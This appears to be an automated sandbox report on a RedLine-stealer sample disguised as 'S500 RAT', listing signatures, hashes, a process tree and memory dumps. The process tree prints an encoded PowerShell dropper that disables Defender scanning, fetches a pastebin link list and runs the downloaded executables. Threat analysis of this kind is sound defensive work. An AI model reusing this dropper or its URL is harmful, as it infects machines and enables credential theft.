Analysis

  • max time kernel
    269s
  • max time network
    274s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    22-11-2024 15:23

General

  • Target

    S500 RAT.zip

  • Size

    40.4MB

  • MD5

    148feb47315d32610c00f3f5db8a1e7b

  • SHA1

    cb14479bdef8aa05fbcf4b845c42d890dd19fd96

  • SHA256

    2e466546d957cccb664961cecbe93fdfa718115b2d17419e1a13a5ad8fceeab2

  • SHA512

    e70e12d459aa503bdea92e191f92e6b05e71ac3638b8c003139a73579c34a8feac6ab7835ed68edeebfdf29f1f463bcab83b50bdf4209df470e8318956e4b529

  • SSDEEP

    786432:q0Y+JAFl0rE/WmcnKPloVCcEjIi/O/mK+fP1JqsvGnPm5WgTutHHJEDTJbM:YFu4EnMloOIiBBq3PguBpwTZM

Malware Config

Extracted

Language
ps1
Source
URLs
ps1.dropper

https://pastebin.com/raw/p2s7tDSd

Signatures

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine payload 3 IoCs
  • Redline family
  • Blocklisted process makes network request 2 IoCs
  • Checks computer location settings 2 TTPs 6 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 9 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
  • Obfuscated Files or Information: Command Obfuscation 1 TTPs

    Adversaries may obfuscate content during command execution to impede detection.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 11 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 5 IoCs
  • Suspicious use of FindShellTrayWindow 3 IoCs
  • Suspicious use of WriteProcessMemory 21 IoCs

Processes

  • C:\Program Files\7-Zip\7zFM.exe
    "C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\S500 RAT.zip"
    1⤵
    • Suspicious behavior: GetForegroundWindowSpam
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    PID:4728
  • C:\Windows\System32\rundll32.exe
    C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
    1⤵
      PID:672
    • C:\Users\Admin\Downloads\S500 RAT\S500RAT.exe
      "C:\Users\Admin\Downloads\S500 RAT\S500RAT.exe"
      1⤵
      • Checks computer location settings
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:5072
      • C:\Users\Admin\AppData\Local\Temp\build.exe
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        2⤵
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        PID:3856
      • C:\Users\Admin\AppData\Local\Temp\S500RAT.exe
        "C:\Users\Admin\AppData\Local\Temp\S500RAT.exe"
        2⤵
        • Checks computer location settings
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:4380
        • C:\Users\Admin\AppData\Local\Temp\blackCC.exe
          "C:\Users\Admin\AppData\Local\Temp\blackCC.exe"
          3⤵
          • Checks computer location settings
          • Executes dropped EXE
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:4344
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGUAeAB3ACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAbAByAHQAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAdQByAG4AIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAdQBxAHAAIwA+ADsAJAB3AGMAIAA9ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkAOwAkAGwAbgBrACAAPQAgACQAdwBjAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AcABhAHMAdABlAGIAaQBuAC4AYwBvAG0ALwByAGEAdwAvAHAAMgBzADcAdABEAFMAZAAnACkALgBTAHAAbABpAHQAKABbAHMAdAByAGkAbgBnAFsAXQBdACIAYAByAGAAbgAiACwAIABbAFMAdAByAGkAbgBnAFMAcABsAGkAdABPAHAAdABpAG8AbgBzAF0AOgA6AE4AbwBuAGUAKQA7ACAAJABmAG4AIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEkATwAuAFAAYQB0AGgAXQA6ADoARwBlAHQAUgBhAG4AZABvAG0ARgBpAGwAZQBOAGEAbQBlACgAKQA7ACAAZgBvAHIAIAAoACQAaQA9ADAAOwAgACQAaQAgAC0AbAB0ACAAJABsAG4AawAuAEwAZQBuAGcAdABoADsAIAAkAGkAKwArACkAIAB7ACAAJAB3AGMALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACQAbABuAGsAWwAkAGkAXQAsACAAPAAjAGgAeABhACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAbQB3AGMAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAZQBhAHAAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACgAJABmAG4AIAArACAAJABpAC4AVABvAFMAdAByAGkAbgBnACgAKQAgACsAIAAnAC4AZQB4AGUAJwApACkAKQAgAH0APAAjAGIAegBzACMAPgA7ACAAZgBvAHIAIAAoACQAaQA9ADAAOwAgACQAaQAgAC0AbAB0ACAAJABsAG4AawAuAEwAZQBuAGcAdABoADsAIAAkAGkAKwArACkAIAB7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAPAAjAHAAdQB3ACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBkAGoAeQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAKAAkAGYAbgAgACsAIAAkAGkALgBUAG8AUwB0AHIAaQBuAGcAKAApACAAKwAgACcALgBlAHgAZQAnACkAKQAgAH0AIAA8ACMAcgBtAHIAIwA+AA=="
            4⤵
            • Blocklisted process makes network request
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:4328
    • C:\Users\Admin\Downloads\S500 RAT\crack.exe
      "C:\Users\Admin\Downloads\S500 RAT\crack.exe"
      1⤵
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      PID:2924
    • C:\Users\Admin\Downloads\S500 RAT\crack.exe
      "C:\Users\Admin\Downloads\S500 RAT\crack.exe"
      1⤵
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      PID:1132
    • C:\Users\Admin\Downloads\S500 RAT\S500RAT.exe
      "C:\Users\Admin\Downloads\S500 RAT\S500RAT.exe"
      1⤵
      • Checks computer location settings
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:4688
      • C:\Users\Admin\AppData\Local\Temp\S500RAT.exe
        "C:\Users\Admin\AppData\Local\Temp\S500RAT.exe"
        2⤵
        • Checks computer location settings
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:2464
        • C:\Users\Admin\AppData\Local\Temp\blackCC.exe
          "C:\Users\Admin\AppData\Local\Temp\blackCC.exe"
          3⤵
          • Checks computer location settings
          • Executes dropped EXE
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:4464
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGUAeAB3ACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAbAByAHQAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAdQByAG4AIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAdQBxAHAAIwA+ADsAJAB3AGMAIAA9ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkAOwAkAGwAbgBrACAAPQAgACQAdwBjAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AcABhAHMAdABlAGIAaQBuAC4AYwBvAG0ALwByAGEAdwAvAHAAMgBzADcAdABEAFMAZAAnACkALgBTAHAAbABpAHQAKABbAHMAdAByAGkAbgBnAFsAXQBdACIAYAByAGAAbgAiACwAIABbAFMAdAByAGkAbgBnAFMAcABsAGkAdABPAHAAdABpAG8AbgBzAF0AOgA6AE4AbwBuAGUAKQA7ACAAJABmAG4AIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEkATwAuAFAAYQB0AGgAXQA6ADoARwBlAHQAUgBhAG4AZABvAG0ARgBpAGwAZQBOAGEAbQBlACgAKQA7ACAAZgBvAHIAIAAoACQAaQA9ADAAOwAgACQAaQAgAC0AbAB0ACAAJABsAG4AawAuAEwAZQBuAGcAdABoADsAIAAkAGkAKwArACkAIAB7ACAAJAB3AGMALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACQAbABuAGsAWwAkAGkAXQAsACAAPAAjAGgAeABhACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAbQB3AGMAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAZQBhAHAAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACgAJABmAG4AIAArACAAJABpAC4AVABvAFMAdAByAGkAbgBnACgAKQAgACsAIAAnAC4AZQB4AGUAJwApACkAKQAgAH0APAAjAGIAegBzACMAPgA7ACAAZgBvAHIAIAAoACQAaQA9ADAAOwAgACQAaQAgAC0AbAB0ACAAJABsAG4AawAuAEwAZQBuAGcAdABoADsAIAAkAGkAKwArACkAIAB7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAPAAjAHAAdQB3ACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBkAGoAeQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAKAAkAGYAbgAgACsAIAAkAGkALgBUAG8AUwB0AHIAaQBuAGcAKAApACAAKwAgACcALgBlAHgAZQAnACkAKQAgAH0AIAA8ACMAcgBtAHIAIwA+AA=="
            4⤵
            • Blocklisted process makes network request
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2844

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

      Filesize

      2KB

      MD5

      968cb9309758126772781b83adb8a28f

      SHA1

      8da30e71accf186b2ba11da1797cf67f8f78b47c

      SHA256

      92099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a

      SHA512

      4bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

      Filesize

      19KB

      MD5

      4e138554e09e63d678aae0be60f321ff

      SHA1

      9b7b6db4dac30db62e146af20127e21e5e6847b6

      SHA256

      9637fb6c07d824c98bca19ea3204fc60f0a18c96dda7007a7749b6dc923bea99

      SHA512

      f7a8d47e40602086268df62a485a9c5d8cfb1d23a838e76b84490944f44b8e19268a85537b448333de9251cf544fbd82239a1e540d13744c3fda51a715554a6b

    • C:\Users\Admin\AppData\Local\Temp\S500RAT.exe

      Filesize

      17.8MB

      MD5

      e5f9792d0889af4fb6c295c5e0d74cee

      SHA1

      1aabebd0923a3e4e1772b48294c7b0fc86973e71

      SHA256

      c5f99ca677d1b5aade06ab17adfa2a5c064c89e2f52875aefbca071ae2189f7f

      SHA512

      4290a88de6fb0e6f851beff8577467760d1fa6afeda0d8a0afd50f6f7ad77d3960c0742260bdc87154c828a67f5807680dc8093386bbcd0ab97ccf8091b1b288

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_hpd412lv.f5m.ps1

      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    • C:\Users\Admin\AppData\Local\Temp\blackCC.exe

      Filesize

      72KB

      MD5

      462b459a2560b65a657cfecce53d682a

      SHA1

      f0ce24faf42d2d1453c4f18fda0223b83486e5ae

      SHA256

      00502647989c700d1cbf37685fcdf3a81d9302fb792edabecb5a211c5cdff0db

      SHA512

      5d88eb5c91dd772d0c6f54e5d799639e1fd59d4dcf112674d065b76bb3ab048442cccc13f2f031f611b9632a223c961c7ad43f09a06b33d2f92adec7da9ff88b

    • C:\Users\Admin\AppData\Local\Temp\build.exe

      Filesize

      506KB

      MD5

      e5fb57e8214483fd395bd431cb3d1c4b

      SHA1

      60e22fc9e0068c8156462f003760efdcac82766b

      SHA256

      e389fc5782f754918a10b020adcd8faa11c25658b8d6f8cbc49f9ac3a7637684

      SHA512

      dc2ed0421db7dd5a3afeacb6a9f5017c97fc07d0b2d1745b50ede50087a58245d31d6669077a672b32541dbfa233ef87260a37be48de3bd407d8c587fc903d89

    • C:\Users\Admin\Downloads\S500 RAT\S500RAT.exe

      Filesize

      18.8MB

      MD5

      f940122c21ea007b2867c03d31fa430c

      SHA1

      efc7dada2c5f732df107a900277a04a57d2354bb

      SHA256

      8587703a22f7b8d33fdcd3f3328344710c1c126a3cb18ccdfb0ff4d18bb0222c

      SHA512

      6cc779db44162fb2b60bf5da0dff711a106a1626434b2ef4e39e658e40a39cbb3074c5836a94ec8ceddbf78cebaf254278a125479abcf1797c5dc5f77a2bb99c

    • memory/1132-312-0x0000000000F00000-0x0000000000F56000-memory.dmp

      Filesize

      344KB

    • memory/2464-338-0x0000000000400000-0x00000000015D4000-memory.dmp

      Filesize

      17.8MB

    • memory/2844-350-0x0000000074B20000-0x0000000074B6C000-memory.dmp

      Filesize

      304KB

    • memory/2924-307-0x0000000000E00000-0x0000000000E56000-memory.dmp

      Filesize

      344KB

    • memory/3856-254-0x00000000059E0000-0x0000000005A1C000-memory.dmp

      Filesize

      240KB

    • memory/3856-264-0x0000000005A80000-0x0000000005ACC000-memory.dmp

      Filesize

      304KB

    • memory/3856-251-0x0000000005B90000-0x0000000005C9A000-memory.dmp

      Filesize

      1.0MB

    • memory/3856-250-0x0000000005980000-0x0000000005992000-memory.dmp

      Filesize

      72KB

    • memory/3856-249-0x00000000060A0000-0x00000000066B8000-memory.dmp

      Filesize

      6.1MB

    • memory/3856-240-0x0000000001200000-0x0000000001256000-memory.dmp

      Filesize

      344KB

    • memory/4328-300-0x0000000007D30000-0x0000000007D44000-memory.dmp

      Filesize

      80KB

    • memory/4328-298-0x0000000007D00000-0x0000000007D11000-memory.dmp

      Filesize

      68KB

    • memory/4328-280-0x0000000006790000-0x00000000067AE000-memory.dmp

      Filesize

      120KB

    • memory/4328-292-0x0000000007790000-0x00000000077AE000-memory.dmp

      Filesize

      120KB

    • memory/4328-282-0x0000000074B20000-0x0000000074B6C000-memory.dmp

      Filesize

      304KB

    • memory/4328-281-0x0000000007750000-0x0000000007782000-memory.dmp

      Filesize

      200KB

    • memory/4328-293-0x00000000077B0000-0x0000000007853000-memory.dmp

      Filesize

      652KB

    • memory/4328-295-0x0000000007B00000-0x0000000007B1A000-memory.dmp

      Filesize

      104KB

    • memory/4328-294-0x0000000008140000-0x00000000087BA000-memory.dmp

      Filesize

      6.5MB

    • memory/4328-296-0x0000000007B50000-0x0000000007B5A000-memory.dmp

      Filesize

      40KB

    • memory/4328-297-0x0000000007DA0000-0x0000000007E36000-memory.dmp

      Filesize

      600KB

    • memory/4328-279-0x0000000006300000-0x0000000006654000-memory.dmp

      Filesize

      3.3MB

    • memory/4328-299-0x0000000007D20000-0x0000000007D2E000-memory.dmp

      Filesize

      56KB

    • memory/4328-268-0x00000000060A0000-0x0000000006106000-memory.dmp

      Filesize

      408KB

    • memory/4328-302-0x0000000007D60000-0x0000000007D68000-memory.dmp

      Filesize

      32KB

    • memory/4328-301-0x0000000007D70000-0x0000000007D8A000-memory.dmp

      Filesize

      104KB

    • memory/4328-269-0x0000000006190000-0x00000000061F6000-memory.dmp

      Filesize

      408KB

    • memory/4328-267-0x0000000006000000-0x0000000006022000-memory.dmp

      Filesize

      136KB

    • memory/4328-265-0x0000000005230000-0x0000000005266000-memory.dmp

      Filesize

      216KB

    • memory/4328-266-0x00000000058A0000-0x0000000005EC8000-memory.dmp

      Filesize

      6.2MB

    • memory/4380-263-0x0000000000400000-0x00000000015D4000-memory.dmp

      Filesize

      17.8MB

    • memory/4688-327-0x0000000000400000-0x00000000016D3000-memory.dmp

      Filesize

      18.8MB

    • memory/5072-247-0x0000000000400000-0x00000000016D3000-memory.dmp

      Filesize

      18.8MB